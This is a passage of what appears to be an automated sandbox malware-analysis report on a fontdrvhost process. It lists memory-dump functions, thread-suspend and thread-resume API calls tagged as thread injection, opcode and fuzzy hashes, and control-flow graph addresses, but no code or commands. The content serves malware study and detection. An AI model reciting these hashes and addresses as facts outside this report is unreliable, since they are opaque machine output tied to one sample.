                                                                    • Opcode ID: 7ffb8ba514f0547423313594b8a3bc12709f30a72b049320a7e7d9c40889e777
                                                                    • Instruction ID: 7012afd3a36d54cc62561f9da4b2b5c4763730b91161369d985f37068ecd3eeb
                                                                    • Opcode Fuzzy Hash: 7ffb8ba514f0547423313594b8a3bc12709f30a72b049320a7e7d9c40889e777
                                                                    • Instruction Fuzzy Hash: 9011D236B2964E8FCB44EF2CE4916E977E0FF94325F010576E849D3250D730A955CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBB0190 Relevance: 1.7, APIs: 1, Instructions: 162threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 8 7ffd9bbb0190-7ffd9bbb01c9 10 7ffd9bbb01cb 8->10 11 7ffd9bbb01cc-7ffd9bbb02a2 ResumeThread 8->11 10->11 15 7ffd9bbb02aa-7ffd9bbb02f4 11->15 16 7ffd9bbb02a4 11->16 16->15
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1802514308.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9bba0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    • Opcode ID: 10ad953ee81afd5dfcfc79308c6a69b71784cd95136d2005a5afb4423b46411a
                                                                    • Instruction ID: bd1ec75428218eda08b2438f3e2885fc4563bfc45df779f63664f615590e0d84
                                                                    • Opcode Fuzzy Hash: 10ad953ee81afd5dfcfc79308c6a69b71784cd95136d2005a5afb4423b46411a
                                                                    • Instruction Fuzzy Hash: 43519D70A0D79C8FDB59DFA8D894AE9BFF0EF16310F1441ABD049D7292CA35A846CB11
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D861D Relevance: 1.7, Strings: 1, Instructions: 404COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^^8
                                                                    • API String ID: 0-1095223944
                                                                    • Opcode ID: fe8809d35884f7076e707647f7b1163fc001695dc12b4f6226cef2c3295f5353
                                                                    • Instruction ID: faa3bc791333d319991822ec4215f3386a57b857fe634d56279091963c948fd3
                                                                    • Opcode Fuzzy Hash: fe8809d35884f7076e707647f7b1163fc001695dc12b4f6226cef2c3295f5353
                                                                    • Instruction Fuzzy Hash: 58510C31B0C61B8FE765BBA894A25F877F0EF04394F1903B6E44D860D6EF29684496C1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBB02F9 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1802514308.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9bba0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID: ChangeCloseFindNotification
                                                                    • String ID:
                                                                    • API String ID: 2591292051-0
                                                                    • Opcode ID: 12046b2d4fef9f00db040b29f04285d21435f1a766757b9be46a00b24219df59
                                                                    • Instruction ID: ab7c2cad141a193aa64fe961443fb54a6acd187bebd712f84703b4c6a8322a16
                                                                    • Opcode Fuzzy Hash: 12046b2d4fef9f00db040b29f04285d21435f1a766757b9be46a00b24219df59
                                                                    • Instruction Fuzzy Hash: 93416F30E0865C8FDB59DF98C899BEDBBF0FF5A310F1041AAD049D7292DA74A845CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBAEAAD Relevance: 1.6, APIs: 1, Instructions: 141threadinjectionCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 86 7ffd9bbaeaad-7ffd9bbaeab9 87 7ffd9bbaeabb-7ffd9bbaeac3 86->87 88 7ffd9bbaeac4-7ffd9bbaeb92 SuspendThread 86->88 87->88 92 7ffd9bbaeb9a-7ffd9bbaebe4 88->92 93 7ffd9bbaeb94 88->93 93->92
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1802514308.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9bba0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID: SuspendThread
                                                                    • String ID:
                                                                    • API String ID: 3178671153-0
                                                                    • Opcode ID: f8643037e8406af874336d15f61f1bc6e45412ffed30c29b7e955c475194a112
                                                                    • Instruction ID: e058b3ca372eae3c3ac9d10ce095fa1eb10e01913db87f818ba854579757f721
                                                                    • Opcode Fuzzy Hash: f8643037e8406af874336d15f61f1bc6e45412ffed30c29b7e955c475194a112
                                                                    • Instruction Fuzzy Hash: 49415C70E0864D8FDB58DFA8D895BEDBBF0FF5A310F10416AD449E7292DA34A845CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBB1F85 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 96 7ffd9bbb1f85-7ffd9bbb2063 GetFileAttributesW 100 7ffd9bbb2065 96->100 101 7ffd9bbb206b-7ffd9bbb20a9 96->101 100->101
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1802514308.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9bba0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 207c655eab8ea26cfb103a55f4131de4156eea71d4e0abf1a7ae8e62e27f3f85
                                                                    • Instruction ID: e72681c7a1f8ff16a6ae93e1523199b4cdf2e820295e5cf8df8df82a3cf114f3
                                                                    • Opcode Fuzzy Hash: 207c655eab8ea26cfb103a55f4131de4156eea71d4e0abf1a7ae8e62e27f3f85
                                                                    • Instruction Fuzzy Hash: 4C410870E08A1C8FDB98DF98D895BEDBBF0FB59310F14416AD409E7252DA71A885CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D86FA Relevance: 1.6, Strings: 1, Instructions: 313COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 103 7ffd9c0d86fa-7ffd9c0d88fb 110 7ffd9c0d8906-7ffd9c0d8998 103->110 125 7ffd9c0d896a-7ffd9c0d8979 call 7ffd9c0d899a 110->125 126 7ffd9c0d8940-7ffd9c0d8969 110->126 126->125
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^^
                                                                    • API String ID: 0-2541302950
                                                                    • Opcode ID: b06296f75e42627c01890fe9e13528a5e0bbad8db77471517ba7b1213a827858
                                                                    • Instruction ID: 5f3f042c4f023eecc7d282207730f36e465d684f8fbac2050be4649fbcf699d5
                                                                    • Opcode Fuzzy Hash: b06296f75e42627c01890fe9e13528a5e0bbad8db77471517ba7b1213a827858
                                                                    • Instruction Fuzzy Hash: 9D31A621B1C75B8FD775DA9484A6178B6F0EF05394F180379E08DC61C5EF686804A782
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9B9F16D3 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 133 7ffd9b9f16d3-7ffd9ba0fad5 139 7ffd9ba0fad7 133->139 140 7ffd9ba0fadc-7ffd9ba0fae1 call 7ffd9b9f16e0 133->140 139->140 142 7ffd9ba0fae6-7ffd9ba0faf1 140->142
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -O_^
                                                                    • API String ID: 0-3106561898
                                                                    • Opcode ID: a32c11aadf4349ec9e2ef583b40e4be875242ef529f784d21b2752d0e03d2be4
                                                                    • Instruction ID: d91d90d2de2515b33da6b9fbf08ef31d83f979beec8aa50fc0babfc417b21d15
                                                                    • Opcode Fuzzy Hash: a32c11aadf4349ec9e2ef583b40e4be875242ef529f784d21b2752d0e03d2be4
                                                                    • Instruction Fuzzy Hash: D2012035B0D14A9FD711FF78E8516DD3BA0EF41324F080172E49DC6083E9256A58C391
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D78D0 Relevance: .7, Instructions: 669COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 143 7ffd9c0d78d0-7ffd9c0d78e0 144 7ffd9c0d7f2a-7ffd9c0d7f40 143->144 145 7ffd9c0d78e6-7ffd9c0d7921 143->145 149 7ffd9c0d7f8a-7ffd9c0d7f9d 144->149 150 7ffd9c0d7f42-7ffd9c0d7f66 144->150 148 7ffd9c0d79ba-7ffd9c0d79c2 145->148 151 7ffd9c0d7926-7ffd9c0d792f 148->151 152 7ffd9c0d79c8 148->152 151->144 154 7ffd9c0d7935-7ffd9c0d7940 151->154 153 7ffd9c0d79d2-7ffd9c0d79ef 152->153 157 7ffd9c0d79f6-7ffd9c0d7a07 153->157 155 7ffd9c0d79ca-7ffd9c0d79ce 154->155 156 7ffd9c0d7946-7ffd9c0d795a 154->156 155->153 158 7ffd9c0d795c-7ffd9c0d7973 156->158 159 7ffd9c0d79b3-7ffd9c0d79b7 156->159 164 7ffd9c0d7a09-7ffd9c0d7a1e 157->164 165 7ffd9c0d7a20-7ffd9c0d7a2f 157->165 158->144 160 7ffd9c0d7979-7ffd9c0d7985 158->160 159->148 162 7ffd9c0d7987-7ffd9c0d799b 160->162 163 7ffd9c0d799f-7ffd9c0d79b0 160->163 162->158 166 7ffd9c0d799d 162->166 163->159 164->165 169 7ffd9c0d7a51-7ffd9c0d7a84 165->169 170 7ffd9c0d7a31-7ffd9c0d7a4c 165->170 166->159 176 7ffd9c0d7a86-7ffd9c0d7abe 169->176 177 7ffd9c0d7ae4-7ffd9c0d7b07 169->177 178 7ffd9c0d7e89-7ffd9c0d7eba 170->178 184 7ffd9c0d7b0f-7ffd9c0d7b56 176->184 185 7ffd9c0d7ac0-7ffd9c0d7ad3 176->185 187 7ffd9c0d7b08-7ffd9c0d7b0d 177->187 190 7ffd9c0d7ebc-7ffd9c0d7ec6 178->190 198 7ffd9c0d7b5a-7ffd9c0d7b7b 184->198 185->144 189 7ffd9c0d7ad9-7ffd9c0d7ae2 185->189 187->185 191 7ffd9c0d7b0e 187->191 189->177 190->143 192 7ffd9c0d7ecc-7ffd9c0d7ed2 190->192 191->184 194 7ffd9c0d7f16-7ffd9c0d7f17 192->194 195 7ffd9c0d7ed4-7ffd9c0d7eda 192->195 194->144 196 7ffd9c0d7edc 195->196 197 7ffd9c0d7ee1-7ffd9c0d7ef0 195->197 196->197 201 7ffd9c0d7bec-7ffd9c0d7bfd 198->201 202 7ffd9c0d7b7d-7ffd9c0d7b81 198->202 204 7ffd9c0d7bfe-7ffd9c0d7c01 201->204 202->187 205 7ffd9c0d7b83 202->205 207 7ffd9c0d7c07-7ffd9c0d7c0b 204->207 206 7ffd9c0d7bac-7ffd9c0d7bbd 205->206 206->207 214 7ffd9c0d7bbf-7ffd9c0d7bcd 206->214 208 7ffd9c0d7c0d-7ffd9c0d7c0f 207->208 210 7ffd9c0d7c59-7ffd9c0d7c61 208->210 211 7ffd9c0d7c11-7ffd9c0d7c1f 208->211 215 7ffd9c0d7cab-7ffd9c0d7cb3 210->215 216 7ffd9c0d7c63-7ffd9c0d7c6c 210->216 212 7ffd9c0d7c21-7ffd9c0d7c25 211->212 213 7ffd9c0d7c90-7ffd9c0d7ca5 211->213 212->206 223 7ffd9c0d7c27 212->223 213->215 220 7ffd9c0d7c3e-7ffd9c0d7c53 214->220 221 7ffd9c0d7bcf-7ffd9c0d7bd3 214->221 218 7ffd9c0d7cb9-7ffd9c0d7cd2 215->218 219 7ffd9c0d7d3b-7ffd9c0d7d49 215->219 222 7ffd9c0d7c6f-7ffd9c0d7c71 216->222 218->219 224 7ffd9c0d7cd4-7ffd9c0d7cd5 218->224 225 7ffd9c0d7dba-7ffd9c0d7dbb 219->225 226 7ffd9c0d7d4b-7ffd9c0d7d4d 219->226 220->210 221->198 235 7ffd9c0d7bd5 221->235 228 7ffd9c0d7ce2-7ffd9c0d7ce4 222->228 229 7ffd9c0d7c73-7ffd9c0d7c75 222->229 223->220 231 7ffd9c0d7cd6-7ffd9c0d7ce0 224->231 230 7ffd9c0d7deb-7ffd9c0d7ded 225->230 232 7ffd9c0d7dc9-7ffd9c0d7dcb 226->232 233 7ffd9c0d7d4f 226->233 241 7ffd9c0d7ce5-7ffd9c0d7ce7 228->241 236 7ffd9c0d7c77 229->236 237 7ffd9c0d7cf1-7ffd9c0d7cf5 229->237 243 7ffd9c0d7e5e-7ffd9c0d7e87 230->243 244 7ffd9c0d7def 230->244 231->228 238 7ffd9c0d7e3c 232->238 239 7ffd9c0d7dcd-7ffd9c0d7dcf 232->239 233->231 240 7ffd9c0d7d51 233->240 235->201 236->204 242 7ffd9c0d7c79 236->242 245 7ffd9c0d7cf7 237->245 246 7ffd9c0d7d71-7ffd9c0d7d8b 237->246 247 7ffd9c0d7ead-7ffd9c0d7eba 238->247 248 7ffd9c0d7e3e-7ffd9c0d7e40 238->248 249 7ffd9c0d7e4b-7ffd9c0d7e4f 239->249 250 7ffd9c0d7dd1 239->250 251 7ffd9c0d7d58-7ffd9c0d7d5c 240->251 263 7ffd9c0d7d68-7ffd9c0d7d70 241->263 264 7ffd9c0d7ce8 241->264 253 7ffd9c0d7c7e-7ffd9c0d7c84 242->253 243->178 255 7ffd9c0d7e0c-7ffd9c0d7e1a 244->255 245->253 256 7ffd9c0d7cf9 245->256 273 7ffd9c0d7dbd-7ffd9c0d7dc6 246->273 274 7ffd9c0d7d8d-7ffd9c0d7d9b 246->274 247->190 248->190 257 7ffd9c0d7e42 248->257 259 7ffd9c0d7ecb-7ffd9c0d7ed2 249->259 260 7ffd9c0d7e51 249->260 250->251 258 7ffd9c0d7dd3 250->258 261 7ffd9c0d7dd8-7ffd9c0d7dde 251->261 262 7ffd9c0d7d5e 251->262 268 7ffd9c0d7d00-7ffd9c0d7d25 253->268 272 7ffd9c0d7c86 253->272 267 7ffd9c0d7e1b-7ffd9c0d7e25 255->267 256->268 257->232 269 7ffd9c0d7e44 257->269 258->261 259->194 259->195 260->261 270 7ffd9c0d7e53 260->270 280 7ffd9c0d7e5a-7ffd9c0d7e5d 261->280 281 7ffd9c0d7de0 261->281 262->241 271 7ffd9c0d7d60 262->271 263->246 264->222 276 7ffd9c0d7ce9-7ffd9c0d7cea 264->276 278 7ffd9c0d7e27-7ffd9c0d7e3a 267->278 285 7ffd9c0d7d28-7ffd9c0d7d39 268->285 269->249 270->280 271->263 272->208 282 7ffd9c0d7c88 272->282 273->232 274->255 283 7ffd9c0d7d9d-7ffd9c0d7d9f 274->283 276->237 278->238 280->243 281->278 287 7ffd9c0d7de2-7ffd9c0d7dea 281->287 282->213 283->267 286 7ffd9c0d7da1 283->286 285->219 285->224 286->285 288 7ffd9c0d7da3 286->288 287->230 288->225
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dac800aa6cf99b7f437fbc01b89c8acfc49f24fb615a858a14760977a2c68925
                                                                    • Instruction ID: c8bf35a334f0113cde04c6f4ea20ee704464c73090aa057848e621733f75ccd5
                                                                    • Opcode Fuzzy Hash: dac800aa6cf99b7f437fbc01b89c8acfc49f24fb615a858a14760977a2c68925
                                                                    • Instruction Fuzzy Hash: FF227530B18A1A8FDBA8DB4CC865A7877F1FF54314F5042B9E01EC7296EB24AC45CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D066C Relevance: .4, Instructions: 392COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 138fd87ad1ef1ce4cdf2b25378186baded4d755d2c568986bc9eed367522fdc1
                                                                    • Instruction ID: ed5db6a0c8d1d34fb39589ffac20ced7325e858da802c03e1640c811063ae864
                                                                    • Opcode Fuzzy Hash: 138fd87ad1ef1ce4cdf2b25378186baded4d755d2c568986bc9eed367522fdc1
                                                                    • Instruction Fuzzy Hash: 4DD1F330B0D74B8FE7799BA884611B87BB0EF45358F9402BAE04EC7182EF296855DB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D0C93 Relevance: .2, Instructions: 238COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a8f80c37868832fd834940b76b37833a557908cd8df8dca07c522f704a74c594
                                                                    • Instruction ID: 251c4b95f52af92328df82c442669cc9ecc0bf168bd517166989482d62133fe2
                                                                    • Opcode Fuzzy Hash: a8f80c37868832fd834940b76b37833a557908cd8df8dca07c522f704a74c594
                                                                    • Instruction Fuzzy Hash: 1371183270CA464FDB68EF58C4959B477F1EBA9318B1442B9E45EC7192EE38F852C780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D8387 Relevance: .2, Instructions: 238COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 433 7ffd9c0d8387-7ffd9c0d838a 434 7ffd9c0d838c 433->434 435 7ffd9c0d8406-7ffd9c0d8409 433->435 436 7ffd9c0d83d3-7ffd9c0d83de 434->436 437 7ffd9c0d838e-7ffd9c0d8391 434->437 438 7ffd9c0d840b 435->438 439 7ffd9c0d8485 435->439 440 7ffd9c0d83df-7ffd9c0d83f9 436->440 441 7ffd9c0d8402-7ffd9c0d8403 437->441 442 7ffd9c0d8393-7ffd9c0d8396 437->442 445 7ffd9c0d8452-7ffd9c0d8467 438->445 446 7ffd9c0d840d-7ffd9c0d8411 438->446 443 7ffd9c0d8506-7ffd9c0d850a 439->443 444 7ffd9c0d8486 439->444 464 7ffd9c0d846a-7ffd9c0d8474 440->464 465 7ffd9c0d83fb-7ffd9c0d83fd 440->465 449 7ffd9c0d8404 441->449 450 7ffd9c0d847f 441->450 451 7ffd9c0d8398 442->451 452 7ffd9c0d8412-7ffd9c0d8415 442->452 447 7ffd9c0d850c 443->447 448 7ffd9c0d8511-7ffd9c0d8523 443->448 453 7ffd9c0d8487-7ffd9c0d848c 444->453 454 7ffd9c0d84cd-7ffd9c0d84df 444->454 445->464 446->452 447->448 458 7ffd9c0d8475-7ffd9c0d8478 449->458 459 7ffd9c0d8405 449->459 456 7ffd9c0d84f0 450->456 457 7ffd9c0d8480-7ffd9c0d8481 450->457 451->440 460 7ffd9c0d839a-7ffd9c0d83a5 451->460 463 7ffd9c0d8416-7ffd9c0d8428 452->463 461 7ffd9c0d848e-7ffd9c0d84a3 453->461 467 7ffd9c0d84e5 454->467 468 7ffd9c0d84f2 456->468 469 7ffd9c0d847d-7ffd9c0d847e 456->469 466 7ffd9c0d8482-7ffd9c0d8484 457->466 471 7ffd9c0d8479 458->471 472 7ffd9c0d84f4-7ffd9c0d84f9 458->472 459->435 460->463 470 7ffd9c0d83a7-7ffd9c0d83ab 460->470 483 7ffd9c0d84a6-7ffd9c0d84b3 461->483 477 7ffd9c0d842c-7ffd9c0d8435 463->477 464->458 464->467 465->471 475 7ffd9c0d83ff 465->475 466->439 476 7ffd9c0d84fc-7ffd9c0d8504 467->476 468->472 469->450 473 7ffd9c0d84fa 469->473 470->477 478 7ffd9c0d83ad-7ffd9c0d83b0 470->478 471->473 474 7ffd9c0d847a 471->474 472->473 473->476 488 7ffd9c0d8555-7ffd9c0d8556 473->488 481 7ffd9c0d847b-7ffd9c0d847c 474->481 482 7ffd9c0d84c1-7ffd9c0d84c6 474->482 486 7ffd9c0d8446 475->486 487 7ffd9c0d8401 475->487 476->443 477->483 484 7ffd9c0d8437 477->484 478->477 489 7ffd9c0d83b2-7ffd9c0d83b7 478->489 481->469 491 7ffd9c0d84c7-7ffd9c0d84cc 482->491 496 7ffd9c0d84b5-7ffd9c0d84b6 483->496 490 7ffd9c0d8438-7ffd9c0d8439 484->490 486->491 492 7ffd9c0d8447 486->492 487->441 489->490 493 7ffd9c0d83b9-7ffd9c0d83d1 489->493 495 7ffd9c0d843a 490->495 490->496 491->454 492->461 497 7ffd9c0d8448-7ffd9c0d8451 492->497 493->436 498 7ffd9c0d84bb-7ffd9c0d84bd 495->498 499 7ffd9c0d843b 495->499 496->498 497->445 498->482 499->466 501 7ffd9c0d843c-7ffd9c0d843f 499->501 501->498 502 7ffd9c0d8441-7ffd9c0d8445 501->502 502->482 502->486
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a4f5cfc4a9b8a26e23b36f281da69663b7c8d80be7734802154d427aa36aab13
                                                                    • Instruction ID: 674902e44c143cb7ceb69deaac10eb0d3f55cd511dd5859234c8e423e76dcddb
                                                                    • Opcode Fuzzy Hash: a4f5cfc4a9b8a26e23b36f281da69663b7c8d80be7734802154d427aa36aab13
                                                                    • Instruction Fuzzy Hash: FC71E231A0C64B4FE7B8DA5888675B937E0FF44362F0403B9F59EC7592FB18A80696C1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DBA00 Relevance: .2, Instructions: 236COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 503 7ffd9c0dba00-7ffd9c0dba10 505 7ffd9c0dba1b-7ffd9c0dba23 503->505 506 7ffd9c0dbab1 505->506 508 7ffd9c0dbabc-7ffd9c0dc31c call 7ffd9c0db5e0 506->508
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 93f006839fc49b003d36560a807c64bfc803e2cdb317e19c2d5cc909518bea4c
                                                                    • Instruction ID: 8442f1e41ebe29ee84ef35cc7df2f3a9dcbe6045760a4fdaf75937a421292624
                                                                    • Opcode Fuzzy Hash: 93f006839fc49b003d36560a807c64bfc803e2cdb317e19c2d5cc909518bea4c
                                                                    • Instruction Fuzzy Hash: DD811531F0C74A4FDB69AB6884756B97BF0EF55300F0402FAE04EC71D6EE6868419B42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D06B0 Relevance: .2, Instructions: 228COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 545 7ffd9c0d06b0-7ffd9c0d06be 546 7ffd9c0d0841-7ffd9c0d084c 545->546 547 7ffd9c0d06c4-7ffd9c0d06d6 call 7ffd9c0d0080 545->547 548 7ffd9c0d084e-7ffd9c0d0855 546->548 549 7ffd9c0d0890-7ffd9c0d08a5 546->549 558 7ffd9c0d06a5-7ffd9c0d0883 547->558 559 7ffd9c0d06d8-7ffd9c0d06dd 547->559 553 7ffd9c0d085c-7ffd9c0d0867 548->553 554 7ffd9c0d0857 548->554 551 7ffd9c0d08a7 549->551 552 7ffd9c0d08ad 549->552 551->552 556 7ffd9c0d08b1-7ffd9c0d08c8 552->556 557 7ffd9c0d08af 552->557 554->553 566 7ffd9c0d08ca-7ffd9c0d0913 556->566 567 7ffd9c0d0911 556->567 557->556 564 7ffd9c0d088a-7ffd9c0d088f 558->564 562 7ffd9c0d06ff-7ffd9c0d0710 559->562 563 7ffd9c0d06df-7ffd9c0d06e3 559->563 562->564 565 7ffd9c0d0716-7ffd9c0d072b 562->565 568 7ffd9c0d06e9-7ffd9c0d06fa 563->568 569 7ffd9c0d07e3-7ffd9c0d07eb 563->569 564->549 565->564 570 7ffd9c0d0731-7ffd9c0d073d 565->570 581 7ffd9c0d08db-7ffd9c0d0917 566->581 582 7ffd9c0d091e-7ffd9c0d093c 566->582 567->566 568->546 571 7ffd9c0d07ed-7ffd9c0d07f4 569->571 572 7ffd9c0d082f-7ffd9c0d0832 569->572 575 7ffd9c0d076e-7ffd9c0d0784 call 7ffd9c0d0080 570->575 576 7ffd9c0d073f-7ffd9c0d0756 570->576 577 7ffd9c0d07fb-7ffd9c0d0806 571->577 578 7ffd9c0d07f6 571->578 580 7ffd9c0d0833-7ffd9c0d083b 572->580 575->569 591 7ffd9c0d0786-7ffd9c0d0791 575->591 576->569 590 7ffd9c0d075c-7ffd9c0d076b 576->590 578->577 580->546 583 7ffd9c0d067a-7ffd9c0d0687 580->583 600 7ffd9c0d08f5-7ffd9c0d0910 581->600 601 7ffd9c0d093e-7ffd9c0d0970 581->601 583->580 585 7ffd9c0d068d-7ffd9c0d06a1 583->585 585->580 590->575 591->564 595 7ffd9c0d0797-7ffd9c0d07ac 591->595 595->564 599 7ffd9c0d07b2-7ffd9c0d07c5 595->599 602 7ffd9c0d0819-7ffd9c0d0821 599->602 603 7ffd9c0d07c7-7ffd9c0d07e1 599->603 609 7ffd9c0d0a58-7ffd9c0d0a5d 601->609 606 7ffd9c0d0829-7ffd9c0d082c 602->606 603->569 607 7ffd9c0d0807-7ffd9c0d0816 603->607 606->572 607->602 614 7ffd9c0d098c-7ffd9c0d0a67 609->614 615 7ffd9c0d0a71-7ffd9c0d0a7e 609->615 625 7ffd9c0d09b6-7ffd9c0d09b9 614->625 626 7ffd9c0d0a3d-7ffd9c0d0a55 614->626 619 7ffd9c0d0ade-7ffd9c0d0ae1 615->619 620 7ffd9c0d0a80-7ffd9c0d0a8f 615->620 620->615 625->626 628 7ffd9c0d09bf-7ffd9c0d09c2 625->628 626->609 630 7ffd9c0d0a2b-7ffd9c0d0a32 628->630 631 7ffd9c0d09c4-7ffd9c0d09f1 628->631 632 7ffd9c0d09f2-7ffd9c0d0a0c 630->632 633 7ffd9c0d0a34-7ffd9c0d0a3c 630->633 635 7ffd9c0d0a91-7ffd9c0d0ad9 632->635 636 7ffd9c0d0a12-7ffd9c0d0a1d 632->636 635->619 636->635 637 7ffd9c0d0a1f-7ffd9c0d0a29 636->637 637->630
                                                                    Memory Dump Source
